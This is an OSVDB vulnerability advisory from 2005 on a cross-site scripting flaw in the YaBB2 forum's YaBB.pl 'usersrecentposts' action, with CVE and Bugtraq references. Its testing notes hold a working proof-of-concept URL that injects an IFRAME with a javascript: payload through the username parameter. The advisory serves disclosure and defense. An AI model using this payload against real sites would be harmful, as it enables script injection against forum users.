YaBB2 YaBB.pl usersrecentposts XSS

2005-03-13T03:24:03
ID OSVDB:14827
Type osvdb
Reporter OSVDB
Modified 2005-03-13T03:24:03

Description

Manual Testing Notes

http://[target]/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Djavascript:alert('XSS-Vulnerability')><%252FIFRAME>

References:

Vendor URL: http://www.yabbforum.com/
Security Tracker: 1013420
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-03/0235.html
CVE-2005-0741
Bugtraq ID: 12756